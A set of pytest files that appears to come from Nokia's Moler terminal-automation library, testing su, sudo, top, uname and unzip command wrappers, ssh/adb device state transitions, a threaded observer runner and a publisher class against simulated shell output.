cmd = Su(buffer_connection, login='xyz', options='-p', password="<PASSWORD>", prompt=None, newline_chars=None)
assert "su -p xyz" == cmd.command_string
def test_su_returns_proper_command_string_pwd(buffer_connection):
cmd = Su(buffer_connection, cmd_class_name='moler.cmd.unix.pwd.Pwd')
assert "su -c 'pwd'" == cmd.command_string
def test_su_catches_authentication_failure(buffer_connection, command_output_and_expected_result_auth):
from moler.exceptions import CommandFailure
command_output, expected_result = command_output_and_expected_result_auth
buffer_connection.remote_inject_response([command_output])
su_cmd = Su(connection=buffer_connection.moler_connection, prompt=r"xyz@debian:", expected_prompt=r"root@debian")
with pytest.raises(CommandFailure):
su_cmd()
def test_su_catches_command_format_failure(buffer_connection,
command_output_and_expected_result_command_format_failure):
from moler.exceptions import CommandFailure
command_output, expected_result = command_output_and_expected_result_command_format_failure
buffer_connection.remote_inject_response([command_output])
su_cmd = Su(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure):
su_cmd()
def test_su_catches_username_failure(buffer_connection, command_output_and_expected_result_username_failure):
from moler.exceptions import CommandFailure
command_output, expected_result = command_output_and_expected_result_username_failure
buffer_connection.remote_inject_response([command_output])
su_cmd = Su(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure):
su_cmd()
def test_sudo_su(buffer_connection):
from moler.cmd.unix.sudo import Sudo
command_output = """sudo su -c 'pwd'
/home/auto/inv
moler_bash#"""
expected_dict = {'full_path': '/home/auto/inv', 'path_to_current': '/home/auto', 'current_path': 'inv'}
buffer_connection.remote_inject_response([command_output])
cmd_su = Su(connection=buffer_connection.moler_connection, prompt=r"moler_bash#",
cmd_class_name='moler.cmd.unix.pwd.Pwd')
cmd_sudo = Sudo(connection=buffer_connection.moler_connection, cmd_object=cmd_su)
ret = cmd_sudo()
assert ret == expected_dict
def test_sudo_su_object(buffer_connection, command_output_and_expected_result_ls_l):
from moler.cmd.unix.sudo import Sudo
from moler.cmd.unix.ls import Ls
command_output = command_output_and_expected_result_ls_l[0]
expected_dict = command_output_and_expected_result_ls_l[1]
buffer_connection.remote_inject_response([command_output])
cmd_ls = Ls(connection=buffer_connection.moler_connection, options="-l")
cmd_su = Su(connection=buffer_connection.moler_connection, cmd_object=cmd_ls)
cmd_sudo = Sudo(connection=buffer_connection.moler_connection, cmd_object=cmd_su)
ret = cmd_sudo()
assert ret == expected_dict
def test_sudo_su_only_params(buffer_connection, command_output_and_expected_result_ls_l):
from moler.cmd.unix.sudo import Sudo
command_output = command_output_and_expected_result_ls_l[0]
expected_dict = command_output_and_expected_result_ls_l[1]
buffer_connection.remote_inject_response([command_output])
cmd_sudo = Sudo(connection=buffer_connection.moler_connection, cmd_class_name="moler.cmd.unix.su.Su",
cmd_params={'cmd_class_name': 'moler.cmd.unix.ls.Ls', 'cmd_params': {'options': '-l'}})
ret = cmd_sudo()
assert ret == expected_dict
def test_failing_calling_twice_the_same_command_object(buffer_connection, command_output_and_expected_result_pwd):
from moler.cmd.unix.pwd import Pwd
command_output, expected_result = command_output_and_expected_result_pwd
buffer_connection.remote_inject_response([command_output])
cmd_pwd = Pwd(connection=buffer_connection.moler_connection)
cmd_su = Su(connection=buffer_connection.moler_connection, password="<PASSWORD>", cmd_object=cmd_pwd)
result = cmd_su()
assert result == expected_result
cmd_sudo = Su(connection=buffer_connection.moler_connection, password="<PASSWORD>", cmd_object=cmd_pwd)
with pytest.raises(CommandFailure):
cmd_sudo()
def test_failing_with_both_parameters(buffer_connection):
from moler.cmd.unix.cp import Cp
cmd_cp = Cp(connection=buffer_connection.moler_connection, src="src", dst="dst")
cmd_sudo = Su(connection=buffer_connection.moler_connection, cmd_class_name="moler.cmd.unix.cp.Cp",
cmd_object=cmd_cp, password="<PASSWORD>")
with pytest.raises(CommandFailure) as err:
cmd_sudo(timeout=0.2)
assert "Both 'cmd_object' and 'cmd_class_name' parameters were provided" in str(err.value)
def test_su_catches_missing_binary_failure(buffer_connection):
from moler.exceptions import CommandFailure
buffer_connection.remote_inject_response(["xyz@debian:~/Moler$ su\n",
"/system/bin/sh: su: not found\n",
"xyz@debian:~/Moler$"])
su_cmd = Su(connection=buffer_connection.moler_connection)
with pytest.raises(CommandFailure) as err:
su_cmd()
assert "/system/bin/sh: su: not found" in str(err.value)
@pytest.fixture
def command_output_and_expected_result_auth():
output = """xyz@debian:~/Moler$ su
Password:
su: Authentication failure
xyz@debian:~/Moler$"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_command_format_failure():
output = """xyz@debian:~/Moler$ su -g
su: invalid option -- 'g'
Usage: su [options] [LOGIN]
Options:
-c, --command COMMAND pass COMMAND to the invoked shell
-h, --help display this help message and exit
-, -l, --login make the shell a login shell
-m, -p,
--preserve-environment do not reset environment variables, and
keep the same shell
-s, --shell SHELL use SHELL instead of the default in passwd
xyz@debian:~/Moler$"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_username_failure():
output = """xyz@debian:~/Moler$ su kla
No passwd entry for user 'kla'
xyz@debian:~/Moler$"""
result = dict()
return output, result
@pytest.fixture
def command_output_and_expected_result_ls_l():
output = """sudo su -c 'ls -l'
total 8
drwxr-xr-x 2 root root 4096 Sep 25 2014 bin
-rw-r--r-- 1 root root 51 Dec 15 10:48 getfzmip.txt
-rw-r--r-- 1 root root 24 Dec 15 10:48 getfzmip.txt-old.20171215-104858.txt
lrwxrwxrwx 1 root root 10 Mar 20 2015 logsremote -> /mnt/logs/
moler_bash#"""
result = {
"total": {
"raw": "8",
"bytes": 8,
},
"files": {
"bin": {"permissions": "drwxr-xr-x", "hard_links_count": 2, "owner": "root", "group": "root",
"size_bytes": 4096, "size_raw": "4096", "date": "Sep 25 2014", "name": "bin", },
"getfzmip.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 51, "size_raw": "51", "date": "Dec 15 10:48", "name": "getfzmip.txt", },
"getfzmip.txt-old.20171215-104858.txt": {"permissions": "-rw-r--r--", "hard_links_count": 1,
"owner": "root",
"group": "root", "size_bytes": 24, "size_raw": "24",
"date": "Dec 15 10:48",
"name": "getfzmip.txt-old.20171215-104858.txt", },
"logsremote": {"permissions": "lrwxrwxrwx", "hard_links_count": 1, "owner": "root", "group": "root",
"size_bytes": 10, "size_raw": "10", "date": "Mar 20 2015", "name": "logsremote",
"link": "/mnt/logs/"},
},
}
return output, result
@pytest.fixture()
def command_output_and_expected_result_pwd():
output = """user@client:~/moler$ su -c 'pwd'
password:
/home/user/moler
ute@debdev:~/moler$ """
result = {
'current_path': 'moler',
'full_path': '/home/user/moler',
'path_to_current': '/home/user'
}
return output, result
```
#### File: cmd/unix/test_cmd_top.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
from moler.cmd.unix.top import Top
from moler.exceptions import CommandFailure
def test_top_returns_proper_command_string(buffer_connection):
top_cmd = Top(buffer_connection, options='-n 3 -S -u root')
assert "top -n 3 -S -u root n 1" == top_cmd.command_string
def test_top_raise_error_on_bad_option(buffer_connection, command_output_and_expected_result_on_bad_option):
top_cmd = Top(connection=buffer_connection.moler_connection, options='abc')
command_output, expected_result = command_output_and_expected_result_on_bad_option
buffer_connection.remote_inject_response([command_output])
assert 'top abc n 1' == top_cmd.command_string
with pytest.raises(CommandFailure):
top_cmd()
@pytest.fixture
def command_output_and_expected_result_on_bad_option():
output = """xyz@debian>top abc n 1
top: unknown option 'a'
Usage:
top -hv | -bcHiOSs -d secs -n max -u|U user -p pid(s) -o field -w [cols]
xyz@debian>"""
result = dict()
return output, result
```
#### File: cmd/unix/test_cmd_uname.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
from moler.exceptions import CommandFailure
from moler.cmd.unix.uname import Uname
import pytest
def test_uname_returns_proper_command_string(buffer_connection):
uname_cmd = Uname(connection=buffer_connection.moler_connection, options="-a")
assert "uname -a" == uname_cmd.command_string
def test_uname_raise_exception_wrong_option(buffer_connection, command_output_and_expected_result_option):
command_output, expected_result = command_output_and_expected_result_option
buffer_connection.remote_inject_response([command_output])
uname_cmd = Uname(connection=buffer_connection.moler_connection, options="-pk")
with pytest.raises(CommandFailure):
uname_cmd()
def test_uname_raise_exception_wrong_command(buffer_connection, command_output_and_expected_result_command):
command_output, expected_result = command_output_and_expected_result_command
buffer_connection.remote_inject_response([command_output])
uname_cmd = Uname(connection=buffer_connection.moler_connection, options="gh")
with pytest.raises(CommandFailure):
uname_cmd()
@pytest.fixture
def command_output_and_expected_result_option():
data = """xyz@debian:~/Moler/$ uname -pk
uname: invalid option -- 'k'
Try 'uname --help' for more information.
xyz@debian:~/Moler/$"""
result = dict()
return data, result
@pytest.fixture
def command_output_and_expected_result_command():
data = """xyz@debian:~/Moler/$ uname gh
uname: extra operand 'gh'
Try 'uname --help' for more information.
xyz@debian:~/Moler/$"""
result = dict()
return data, result
```
#### File: cmd/unix/test_cmd_unzip.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2019, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.exceptions import CommandFailure
from moler.cmd.unix.unzip import Unzip
def test_unzip_returns_fail(buffer_connection):
"""
Test if the proper exception is raised when unzip tries to extract an invalid file.
:param buffer_connection: Simulation of a real connection with a device.
:return: Nothing.
"""
command_output = """
ute@debdev:~$ unzip test.zip
unzip: cannot find or open test.zip, test.zip.zip or test.zip.ZIP.
ute@debdev:~$
"""
buffer_connection.remote_inject_response([command_output])
cmd = Unzip(connection=buffer_connection.moler_connection, zip_file="test.zip")
with pytest.raises(CommandFailure):
cmd()
def test_unzip_forbidden_to_overwrite(buffer_connection):
"""
Test if the proper exception is raised when unzip is not allowed to overwrite an existing file.
:param buffer_connection: Simulation of a real connection with a device.
:return: Nothing.
"""
command_output = """
host:~ # unzip test.zip
Archive: test.zip
replace test.txt? [y]es, [n]o, [A]ll, [N]one, [r]ename: N
host:~ # """
buffer_connection.remote_inject_response([command_output])
cmd = Unzip(connection=buffer_connection.moler_connection, zip_file="test.zip")
with pytest.raises(CommandFailure):
cmd()
def test_unzip_filename_not_matched(buffer_connection):
"""
Test if an exception is raised when the extraction directory cannot be created.
:param buffer_connection: Simulation of a real connection with a device.
:return: Nothing.
"""
command_output = """
host:~ # unzip test.zip -d test/test
Archive: test.zip
checkdir: cannot create extraction directory: test/test
No such file or directory
host:~ # """
buffer_connection.remote_inject_response([command_output])
cmd = Unzip(connection=buffer_connection.moler_connection, zip_file="test.zip", extract_dir="test/test")
with pytest.raises(CommandFailure):
cmd()
```
#### File: test/device/test_SM_at_remote.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import pytest
from moler.util.devices_SM import iterate_over_device_states, get_device
def test_at_remote_device(device_connection, at_remote_output):
at_remote = get_device(name="AT_REMOTE", connection=device_connection, device_output=at_remote_output,
test_file_path=__file__)
iterate_over_device_states(device=at_remote)
@pytest.fixture
def at_remote_output():
plink_cmd_string = 'plink -serial COM5 |& awk \'BEGIN {print "COM5> port READY"} {print} END {print "^C"}\''
output = {
"UNIX_LOCAL": {
'TERM=xterm-mono ssh -l remote_login -o ServerAliveInterval=7 -o ServerAliveCountMax=2 remote_host': 'remote#',
'su': 'local_root_prompt'
},
"UNIX_LOCAL_ROOT": {
'exit': 'moler_bash#'
},
"UNIX_REMOTE": {
'exit': 'moler_bash#',
'su': 'remote_root_prompt',
plink_cmd_string: 'COM5>'
},
"AT_REMOTE": {
'\x03': '^C\nremote#',
},
"UNIX_REMOTE_ROOT": {
'exit': 'remote#',
},
}
return output
```
#### File: test/integration/test_devices_SM.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2020-2021, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
import sys
from moler.device import DeviceFactory
python3_only = pytest.mark.skipif(sys.version_info < (3, 0),
reason="Not stable under Python2 which is no more supported.")
@python3_only
def test_proxy_pc_with_sshshell(loaded_proxy_pc_config):
dev = DeviceFactory.get_device(name="PROXY")
assert dev.current_state == "PROXY_PC"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_proxy_pc_with_sshshell_cant_use_unix_local_states(loaded_proxy_pc_config):
with pytest.raises(ValueError) as err:
DeviceFactory.get_device(name="PROXY", initial_state="UNIX_LOCAL")
assert "has no UNIX_LOCAL/UNIX_LOCAL_ROOT states" in str(err.value)
assert "since it uses following io: ThreadedSshShell" in str(err.value)
assert 'You need io of type "terminal" to have unix-local states' in str(err.value)
@python3_only
def test_proxy_pc_with_terminal_can_use_unix_local_states(loaded_proxy_pc_config, uxlocal2proxypc_connection_hops):
# check backward compatibility
dev = DeviceFactory.get_device(name="PROXY",
initial_state="UNIX_LOCAL",
connection_hops=uxlocal2proxypc_connection_hops,
connection_desc={"io_type": "terminal"})
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_LOCAL")
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_unix_remote_with_sshshell_only(loaded_unix_remote_config):
dev = DeviceFactory.get_device(name="UX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
# dev.goto_state("UNIX_REMOTE_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "UNIX_REMOTE_ROOT"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_unix_remote_with_sshshell_via_proxy_pc(loaded_unix_remote_config, proxypc2uxroot_connection_hops):
dev = DeviceFactory.get_device(name="UX_REMOTE", initial_state="PROXY_PC",
connection_desc={'io_type': 'sshshell',
'host': 'localhost',
'login': 'sshproxy',
'password': '<PASSWORD>'},
connection_hops=proxypc2uxroot_connection_hops)
assert dev._use_proxy_pc is True
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
# dev.goto_state("UNIX_REMOTE_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "UNIX_REMOTE_ROOT"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_unix_remote_with_sshshell_cant_use_unix_local_states(loaded_unix_remote_config):
with pytest.raises(ValueError) as err:
DeviceFactory.get_device(name="UX_REMOTE", initial_state="UNIX_LOCAL")
assert "has no UNIX_LOCAL/UNIX_LOCAL_ROOT states" in str(err.value)
assert "since it uses following io: ThreadedSshShell" in str(err.value)
assert 'You need io of type "terminal" to have unix-local states' in str(err.value)
@python3_only
def test_unix_remote_with_terminal_can_use_unix_local_states(loaded_unix_remote_config, uxlocal2uxremote_connection_hops):
# check backward compatibility
dev = DeviceFactory.get_device(name="UX_REMOTE",
initial_state="UNIX_LOCAL",
connection_hops=uxlocal2uxremote_connection_hops,
connection_desc={"io_type": "terminal"})
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
# dev.goto_state("UNIX_REMOTE_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "UNIX_REMOTE_ROOT"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_LOCAL")
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_adb_remote_with_sshshell_only(loaded_adb_device_config):
dev = DeviceFactory.get_device(name="ADB_LHOST")
assert dev.current_state == "ADB_SHELL"
# dev.goto_state("ADB_SHELL_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "ADB_SHELL_ROOT"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_adb_remote_with_sshshell_via_proxy_pc(loaded_adb_device_config, proxypc2adbshell_connection_hops):
dev = DeviceFactory.get_device(name="ADB_LHOST", initial_state="PROXY_PC",
connection_desc={'io_type': 'sshshell',
'host': 'localhost',
'login': 'sshproxy',
'password': '<PASSWORD>'},
connection_hops=proxypc2adbshell_connection_hops)
assert dev._use_proxy_pc is True
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("ADB_SHELL")
assert dev.current_state == "ADB_SHELL"
# dev.goto_state("ADB_SHELL_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "ADB_SHELL_ROOT"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
@python3_only
def test_adb_remote_with_terminal_can_use_unix_local_states(loaded_adb_device_config, uxlocal2adbshell_connection_hops):
# check backward compatibility
dev = DeviceFactory.get_device(name="ADB_LHOST",
initial_state="UNIX_LOCAL",
connection_hops=uxlocal2adbshell_connection_hops,
connection_desc={"io_type": "terminal"})
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("ADB_SHELL")
assert dev.current_state == "ADB_SHELL"
# dev.goto_state("ADB_SHELL_ROOT") # can't test; need to know root password on CI machine
# assert dev.current_state == "ADB_SHELL_ROOT"
dev.goto_state("UNIX_REMOTE")
assert dev.current_state == "UNIX_REMOTE"
dev.goto_state("PROXY_PC")
assert dev.current_state == "PROXY_PC"
dev.goto_state("UNIX_LOCAL")
assert dev.current_state == "UNIX_LOCAL"
dev.goto_state("NOT_CONNECTED")
assert dev.current_state == "NOT_CONNECTED"
dev.remove()
# ------------------------------------------------------------
@pytest.fixture
def empty_connections_config():
import mock
import moler.config.connections as conn_cfg
default_variant = {"terminal": "threaded", "sshshell": "threaded"}
with mock.patch.object(conn_cfg, "default_variant", default_variant):
with mock.patch.object(conn_cfg, "named_connections", {}):
yield conn_cfg
@pytest.fixture()
def empty_devices_config():
import mock
import moler.config.devices as dev_cfg
empty_named_devices = {}
default_connection = {"io_type": "terminal", "variant": "threaded"}
with mock.patch.object(dev_cfg, "named_devices", empty_named_devices):
with mock.patch.object(dev_cfg, "default_connection", default_connection):
yield
@pytest.fixture
def empty_devfactory_config():
import mock
from moler.device.device import DeviceFactory as dev_factory
with mock.patch.object(dev_factory, "_devices", {}):
with mock.patch.object(dev_factory, "_devices_params", {}):
with mock.patch.object(dev_factory, "_unique_names", {}):
with mock.patch.object(dev_factory, "_already_used_names", set()):
with mock.patch.object(dev_factory, "_was_any_device_deleted", False):
yield
@pytest.fixture
def empty_moler_config(empty_connections_config, empty_devices_config, empty_devfactory_config):
import mock
import moler.config as moler_cfg
empty_loaded_config = ["NOT_LOADED_YET"]
with mock.patch.object(moler_cfg, "loaded_config", empty_loaded_config):
yield
@pytest.fixture()
def loaded_adb_device_config(empty_moler_config):
import yaml
from moler.config import load_device_from_config
adb_dev_config_yaml = """
DEVICES:
ADB_LHOST:
DEVICE_CLASS: moler.device.adbremote2.AdbRemote2
CONNECTION_DESC:
io_type: sshshell
host: localhost
login: molerssh
password: <PASSWORD>
CONNECTION_HOPS:
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell
command_params:
serial_number: '1234567890'
ADB_SHELL:
ADB_SHELL_ROOT:
execute_command: su
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
adb_dev_config = yaml.load(adb_dev_config_yaml, Loader=yaml.FullLoader)
load_device_from_config(adb_dev_config)
@pytest.fixture()
def loaded_proxy_pc_config(empty_moler_config):
import yaml
from moler.config import load_device_from_config
config_yaml = """
DEVICES:
PROXY:
DEVICE_CLASS: moler.device.proxy_pc2.ProxyPc2
CONNECTION_DESC:
io_type: sshshell
host: localhost
login: sshproxy
password: <PASSWORD>
# no CONNECTION_HOPS since if using sshshell it jumps NOT_CONNECTED -> PROXY_PC
"""
dev_config = yaml.load(config_yaml, Loader=yaml.FullLoader)
load_device_from_config(dev_config)
@pytest.fixture()
def loaded_unix_remote_config(empty_moler_config):
import yaml
from moler.config import load_device_from_config
config_yaml = """
DEVICES:
UX_REMOTE:
DEVICE_CLASS: moler.device.unixremote2.UnixRemote2
CONNECTION_DESC:
io_type: sshshell
host: localhost
login: molerssh
password: <PASSWORD>
# using sshshell it jumps NOT_CONNECTED -> REMOTE_UNIX
CONNECTION_HOPS:
UNIX_REMOTE:
UNIX_REMOTE_ROOT:
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
dev_config = yaml.load(config_yaml, Loader=yaml.FullLoader)
load_device_from_config(dev_config)
@pytest.fixture()
def uxlocal2proxypc_connection_hops():
import yaml
hops_yaml = """
UNIX_LOCAL:
PROXY_PC:
execute_command: ssh
command_params:
host: localhost
login: sshproxy
password: <PASSWORD>
expected_prompt: 'sshproxy@\S+'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def proxypc2uxremote_connection_hops():
import yaml
hops_yaml = """
PROXY_PC:
UNIX_REMOTE:
execute_command: ssh
command_params:
host: localhost
login: molerssh
password: <PASSWORD>
expected_prompt: 'molerssh@\S+'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def ux2uxroot_connection_hops():
import yaml
hops_yaml = """
UNIX_REMOTE:
UNIX_REMOTE_ROOT:
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def proxypc2uxroot_connection_hops(proxypc2uxremote_connection_hops, ux2uxroot_connection_hops):
hops = proxypc2uxremote_connection_hops
hops.update(ux2uxroot_connection_hops)
return hops
@pytest.fixture()
def uxlocal2uxremote_connection_hops(uxlocal2proxypc_connection_hops,
proxypc2uxroot_connection_hops):
hops = uxlocal2proxypc_connection_hops
hops.update(proxypc2uxroot_connection_hops)
return hops
@pytest.fixture()
def ux2adbshell_connection_hops():
import yaml
hops_yaml = """
UNIX_REMOTE:
ADB_SHELL:
execute_command: adb_shell
command_params:
serial_number: '1234567890'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def adbshell2adbshellroot_connection_hops():
import yaml
hops_yaml = """
ADB_SHELL:
ADB_SHELL_ROOT:
execute_command: su
command_params:
password: <PASSWORD>
expected_prompt: 'root@\S+#'
"""
hops = yaml.load(hops_yaml, Loader=yaml.FullLoader)
return hops
@pytest.fixture()
def proxypc2adbshell_connection_hops(proxypc2uxremote_connection_hops,
ux2adbshell_connection_hops, adbshell2adbshellroot_connection_hops):
hops = proxypc2uxremote_connection_hops
hops.update(adbshell2adbshellroot_connection_hops)
hops.update(ux2adbshell_connection_hops)
return hops
@pytest.fixture()
def uxlocal2adbshell_connection_hops(uxlocal2proxypc_connection_hops,
proxypc2adbshell_connection_hops):
hops = uxlocal2proxypc_connection_hops
hops.update(proxypc2adbshell_connection_hops)
return hops
```
#### File: test/integration/test_io_device_unix_on_terminal.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2018-2019, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
import pytest
from moler.device.unixlocal import UnixLocal
from moler.exceptions import DeviceFailure
from moler.util.moler_test import MolerTest
def test_unix_device_can_execute_cmds():
unix = UnixLocal(io_type='terminal', variant='threaded')
unix.establish_connection()
cmd = unix.get_cmd(
cmd_name='ls',
cmd_params={
"options": "-l"
}
)
r = cmd()
assert (r is not None)
cmd = unix.get_cmd('whoami')
r = cmd()
assert (r is not None)
def test_device_unix_can_not_execute_cmds_in_incorect_state():
unix = UnixLocal(io_type='terminal', variant='threaded')
unix.establish_connection()
unix.goto_state(UnixLocal.not_connected)
with pytest.raises(DeviceFailure, match=r'Failed to create .*-object for .* is unknown for state .* of device .*'):
unix.get_cmd(
cmd_name='cd',
cmd_params={
"path": "/home/user/"
}
)
def test_unix_local_cmd_with_event():
unix = UnixLocal(io_type='terminal', variant='threaded')
unix.establish_connection()
unix.goto_state(UnixLocal.unix_local)
rets = {'ping': None, 'whoami': None}
def callback_response():
cmd_whoami = unix.get_cmd(cmd_name="whoami")
rets['whoami'] = cmd_whoami()
event_reconnect = unix.get_event(event_name="ping_response", event_params={})
event_reconnect.add_event_occurred_callback(
callback=callback_response,
)
event_reconnect.start()
cmd_ping = unix.get_cmd(cmd_name="ping", cmd_params={'destination': '127.0.0.1', 'options': '-c 1'})
rets['ping'] = cmd_ping(timeout=5)
MolerTest.sleep(1)
assert rets['ping'] is not None
assert rets['whoami'] is not None
```
#### File: test/integration/test_thread_based_runner.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import threading
import time
import pytest
from moler.connection_observer import ConnectionObserver
def test_can_submit_connection_observer_into_background(connection_observer,
observer_runner):
connection_observer.life_status.start_time = time.time() # must start observer lifetime before runner.submit()
connection_observer_future = observer_runner.submit(connection_observer)
# see API of concurrent.futures.Future
try:
assert not connection_observer_future.done()
assert not connection_observer.done()
time.sleep(0.1) # give thread a chance to gain control
assert connection_observer_future.running()
finally: # test cleanup
connection_observer_future.cancel()
def test_CancellableFuture_can_be_cancelled_while_it_is_running(observer_runner):
from concurrent.futures import ThreadPoolExecutor, CancelledError
from moler.runner import CancellableFuture
# concurrent.futures.Future can't cancel() while it is already running
stop_running = threading.Event()
is_done = threading.Event()
def activity(stop_running, is_done):
while not stop_running.is_set():
time.sleep(0.5)
is_done.set()
future = ThreadPoolExecutor().submit(activity, stop_running, is_done)
observer_lock = threading.Lock()
c_future = CancellableFuture(future, observer_lock, stop_running, is_done)
try:
time.sleep(0.1) # allow threads switch to ensure future running
assert c_future.running()
cancelled = c_future.cancel()
time.sleep(0.1) # allow threads switch
assert not c_future.running()
assert is_done.is_set()
assert cancelled is True
assert c_future.cancelled()
assert c_future.done()
with pytest.raises(CancelledError):
c_future.result()
except AssertionError:
raise
finally:
stop_running.set()
# --------------------------- resources ---------------------------
@pytest.yield_fixture()
def observer_runner():
from moler.runner import ThreadPoolExecutorRunner
runner = ThreadPoolExecutorRunner()
yield runner
runner.shutdown()
class NetworkDownDetector(ConnectionObserver):
def __init__(self, connection=None, runner=None):
super(NetworkDownDetector, self).__init__(connection=connection, runner=runner)
self.all_data_received = []
def data_received(self, data, recv_time):
"""
Awaiting change like:
64 bytes from 10.0.2.15: icmp_req=3 ttl=64 time=0.045 ms
ping: sendmsg: Network is unreachable
"""
self.all_data_received.append(data)
if not self.done():
if "Network is unreachable" in data:
when_detected = time.time()
self.set_result(result=when_detected)
@pytest.fixture()
def connection_observer():
from moler.threaded_moler_connection import ThreadedMolerConnection
moler_conn = ThreadedMolerConnection()
observer = NetworkDownDetector(connection=moler_conn)
return observer
@pytest.fixture()
def observer_and_awaited_data(connection_observer):
awaited_data = 'ping: sendmsg: Network is unreachable'
return connection_observer, awaited_data
```
#### File: moler/test/test_moler_sleep.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import time
from moler.util.moler_test import MolerTest
def test_sleep_for_threaded_variant():
sleep_time = 1
start_time = time.time()
MolerTest.sleep(sleep_time)
stop_time = time.time()
elapsed = stop_time - start_time
assert round(elapsed) == sleep_time
```
#### File: moler/test/test_publisher.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2020, Nokia'
__email__ = '<EMAIL>'
import gc
import pytest
import mock
class Subscriber(object):
def __init__(self):
self.received_data = []
def on_new_data(self, data):
self.received_data.append(data)
def test_doesnt_subscribe_same_subscriber_twice():
from moler.publisher import Publisher
observer = Subscriber()
notifier = Publisher()
notifier.subscribe(subscriber=observer.on_new_data)
notifier.subscribe(subscriber=observer.on_new_data)
notifier.notify_subscribers(data=b"incoming data")
assert len(observer.received_data) == 1
def test_can_notify_multiple_subscribers_about_data():
from moler.publisher import Publisher
observer1 = Subscriber()
observer2 = Subscriber()
notifier = Publisher()
notifier.subscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.notify_subscribers(data=b"incoming data")
assert b"incoming data" in observer1.received_data
assert b"incoming data" in observer2.received_data
def test_notifies_only_subscribed_ones_about_data():
from moler.publisher import Publisher
observer1 = Subscriber()
observer2 = Subscriber()
observer3 = Subscriber()
notifier = Publisher()
notifier.subscribe(subscriber=observer1.on_new_data)
notifier.subscribe(subscriber=observer2.on_new_data)
notifier.notify_subscribers(data=b"incoming data")
assert b"incoming data" in observer1.received_data
assert b"incoming data" in observer2.received_data
assert b"incoming data" not in observer3.received_data # that one was not subscribed
def test_notified_subscriber_may_stop_subscription():
from moler.publisher import Publisher
notifier = Publisher()
received_data = []
def one_time_observer(data):
received_data.append(data)
notifier.unsubscribe(subscriber=one_time_observer)
notifier.subscribe(subscriber=one_time_observer)
notifier.notify_subscribers(data=b"data 1")
notifier.notify_subscribers(data=b"data 2")
assert b"data 1" in received_data
assert b"data 2" not in received_data # because of unsubscription during notification
